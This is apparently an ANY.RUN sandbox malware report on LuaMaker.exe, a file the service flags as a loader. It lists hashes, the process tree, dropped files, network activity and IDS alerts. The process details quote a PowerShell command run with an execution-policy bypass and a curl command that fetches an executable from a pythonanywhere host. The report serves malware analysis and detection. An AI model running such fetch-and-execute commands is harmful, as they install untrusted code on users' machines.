File name:

LuaMaker.exe

Full analysis: https://app.any.run/tasks/3ecbc11a-e5f7-43be-95bd-1bd98762d658
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 30, 2024, 10:03:14
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (console) Intel 80386, for MS Windows, 5 sections
MD5:

F4DE9B6913524F371EC0014DAC00F0A8

SHA1:

C3A9525D7C10802C9A1CC4D90B221515364431DC

SHA256:

9F755ED08ED54AFB7B8520135512D11A6DF147830A6533853DD1EC5A1C64A61C

SSDEEP:

3072:KCYa+0Nu6vQAkQ5S7JmyxCbBKhiTbMoD+UOOK0DqM40:rQLi8NiTb/g0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4716)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3524)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • LuaMaker.exe (PID: 3732)
      • cmd.exe (PID: 5464)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3524)
    • The process executes Powershell scripts

      • cmd.exe (PID: 3524)
    • Executing commands from a ".bat" file

      • LuaMaker.exe (PID: 3732)
    • Application launched itself

      • cmd.exe (PID: 5464)
      • LuaMaker.exe (PID: 3816)
    • Potential Corporate Privacy Violation

      • curl.exe (PID: 396)
    • Process requests binary or script from the Internet

      • curl.exe (PID: 396)
    • Process drops legitimate windows executable

      • LuaMaker.exe (PID: 3816)
    • The process drops C-runtime libraries

      • LuaMaker.exe (PID: 3816)
    • Executable content was dropped or overwritten

      • LuaMaker.exe (PID: 3816)
    • Process drops python dynamic module

      • LuaMaker.exe (PID: 3816)
  • INFO

    • Create files in a temporary directory

      • LuaMaker.exe (PID: 3732)
      • cmd.exe (PID: 5464)
    • Checks supported languages

      • LuaMaker.exe (PID: 3732)
    • Manual execution by a user

      • LuaMaker.exe (PID: 3816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (41)
.exe | Win64 Executable (generic) (36.3)
.dll | Win32 Dynamic Link Library (generic) (8.6)
.exe | Win32 Executable (generic) (5.9)
.exe | Win16/32 Executable Delphi generic (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:07:30 08:52:45+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 2.5
CodeSize: 70656
InitializedDataSize: 481280
UninitializedDataSize: -
EntryPoint: 0x1000
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
8
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start luamaker.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs curl.exe luamaker.exe luamaker.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
396curl -o "C:\Users\admin\Desktop\LuaMaker.exe" "http://gameboxbybear.pythonanywhere.com/downloads/LuaMaker.exe"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeLuaMaker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3524C:\WINDOWS\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -File temp.ps1C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3732"C:\Users\admin\AppData\Local\Temp\LuaMaker.exe" C:\Users\admin\AppData\Local\Temp\LuaMaker.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\local\temp\luamaker.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3816"C:\Users\admin\Desktop\LuaMaker.exe" C:\Users\admin\Desktop\LuaMaker.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\luamaker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
4716powershell -ExecutionPolicy Bypass -File temp.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
5040"C:\Users\admin\Desktop\LuaMaker.exe" C:\Users\admin\Desktop\LuaMaker.exeLuaMaker.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\luamaker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
5464"C:\WINDOWS\sysnative\cmd" /c "C:\Users\admin\AppData\Local\Temp\644B.tmp\644C.tmp\644D.bat C:\Users\admin\AppData\Local\Temp\LuaMaker.exe"C:\Windows\System32\cmd.exeLuaMaker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
Total events
5 526
Read events
5 522
Write events
4
Delete events
0

Modification events

(PID) Process:(4716) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:GlobalAssocChangedCounter
Value:
105
(PID) Process:(4716) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
Operation:writeName:LastUpdate
Value:
F7E24A6700000000
(PID) Process:(4716) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:Browse For Folder Width
Value:
318
(PID) Process:(4716) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:Browse For Folder Height
Value:
288
Executable files
84
Suspicious files
85
Text files
5
Unknown types
9

Dropped files

PID
Process
Filename
Type
3816LuaMaker.exeC:\Users\admin\AppData\Local\Temp\_MEI38162\PyQt6\Qt6\bin\Qt6Svg.dllexecutable
MD5:AFFBBFD53FD7EEB00E6851CA46B4F191
SHA256:01000B464FBF9B9C9989367CBE973DFF0D0B7CE893E24476022A097AE05C51BE
3816LuaMaker.exeC:\Users\admin\AppData\Local\Temp\_MEI38162\PyQt6\Qt6\bin\MSVCP140_1.dllexecutable
MD5:0FE6D52EB94C848FE258DC0EC9FF4C11
SHA256:446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
4716powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:20AB0BE6BB67FAF357BF70A672BB2BA8
SHA256:04D0BFF5A53B94591F928B8315338739CD6B12E430F5972416901F4084470F9E
4716powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5t4r5htl.sch.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3816LuaMaker.exeC:\Users\admin\AppData\Local\Temp\_MEI38162\PyQt6\Qt6\bin\MSVCP140.dllexecutable
MD5:01B946A2EDC5CC166DE018DBB754B69C
SHA256:88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
3816LuaMaker.exeC:\Users\admin\AppData\Local\Temp\_MEI38162\PyQt6\Qt6\bin\MSVCP140_2.dllexecutable
MD5:9002E0BEE6455B2322E3E717FE25F9BE
SHA256:24B47C966B6E4A65B3E4DF866D347D3427E9BD709BE550C38224427EB5E143D3
3816LuaMaker.exeC:\Users\admin\AppData\Local\Temp\_MEI38162\PyQt6\Qt6\bin\Qt6Pdf.dllexecutable
MD5:386D2E83D51577D20AC15E4122C2A0FD
SHA256:D87B8A7B59F6FD7B5288339054C189E03E7536DA6BD6D40ED01F6CEE0C635001
3816LuaMaker.exeC:\Users\admin\AppData\Local\Temp\_MEI38162\PyQt6\Qt6\bin\Qt6Network.dllexecutable
MD5:980FDB15E0F17E4BB094D29A540A5ABE
SHA256:CD69452BA2C05CBB94A5F4D4BE34C7750EB09FEE1E746AFBE1AB0E7539CF04FA
3816LuaMaker.exeC:\Users\admin\AppData\Local\Temp\_MEI38162\PyQt6\Qt6\bin\VCRUNTIME140.dllexecutable
MD5:971DBBE854FC6AB78C095607DFAD7B5C
SHA256:5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
3816LuaMaker.exeC:\Users\admin\AppData\Local\Temp\_MEI38162\PyQt6\Qt6\plugins\iconengines\qsvgicon.dllexecutable
MD5:86ACD7B222196BCC95DD20A7038C5C12
SHA256:0194BC1679CDBFF3EEEC85E56D6D97D7B8A1A5DDD0BF026BA90356BAE1D4E8FF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
33
DNS requests
18
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4300
svchost.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4300
svchost.exe
GET
200
23.37.237.227:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
396
curl.exe
GET
200
35.173.69.207:80
http://gameboxbybear.pythonanywhere.com/downloads/LuaMaker.exe
unknown
whitelisted
2076
SIHClient.exe
GET
200
23.37.237.227:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2076
SIHClient.exe
GET
200
23.37.237.227:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4540
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4300
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
396
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5064
SearchApp.exe
2.16.204.142:443
Akamai International B.V.
DE
unknown
4
System
192.168.100.255:137
whitelisted
4300
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4300
svchost.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4300
svchost.exe
23.37.237.227:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4300
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.46
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
whitelisted
www.microsoft.com
  • 23.37.237.227
whitelisted
login.live.com
  • 20.190.159.73
  • 20.190.159.0
  • 20.190.159.64
  • 40.126.31.69
  • 20.190.159.75
  • 20.190.159.2
  • 40.126.31.73
  • 20.190.159.68
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
gameboxbybear.pythonanywhere.com
  • 35.173.69.207
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

PID
Process
Class
Message
396
curl.exe
Misc activity
ET INFO Observed HTTP Request to *.pythonanywhere .com Domain
396
curl.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
396
curl.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info